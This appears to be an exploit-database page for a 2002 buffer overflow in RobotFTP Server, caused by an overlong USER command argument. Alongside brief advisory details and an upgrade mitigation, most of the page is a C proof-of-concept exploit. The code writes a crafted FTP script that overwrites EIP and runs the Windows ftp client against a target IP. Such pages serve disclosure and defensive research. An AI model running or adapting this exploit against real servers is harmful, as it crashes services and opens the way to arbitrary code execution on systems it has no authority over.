header-logo
Suggest Exploit
vendor:
RobotFTP Server
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: RobotFTP Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

RobotFTP Server Buffer Overflow Vulnerability

A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length. An attacker can exploit this vulnerability by sending a specially crafted 'USER' command with an argument of excessive length, resulting in a buffer overflow. This may allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of RobotFTP Server.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/9672/info

A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length.

/******************************
this is example code for the vulnerability. It uses the windows ftp client to connect to a server
******************************/
#include <stdio.h>

char buffer[2500];
char cmd[50];

int main(int argc, char *argv[])
{
        FILE *evil;

        if(argv[1] == NULL)
        {
                printf("Usage: %s [IP]\n\n",argv[0]);
                return 0;
        }

        memset(buffer,0x41,47);
        memcpy(buffer+47,"\r\n",2);
        memcpy(buffer+49,"crash",5);
        memcpy(buffer+54,"\r\n",2);
        memcpy(buffer+56,"USER ",5);
        memset(buffer+61,0x41,1989);
        memset(buffer+61+1989,0x58,4);  // << overwrites the eip with XXXX
        memcpy(buffer+65+1989,"\r\n",2);

        sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);


        if((evil = fopen("ftp.txt", "a+")) != NULL)
        {
                fputs(buffer, evil);
                fclose(evil);
                printf("- file written!\n");
        }
        else
        {
                fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
                exit(1);
        }
        system(cmd);

}
/*******************************/

Navigation

Suggest Exploit

Services By CQR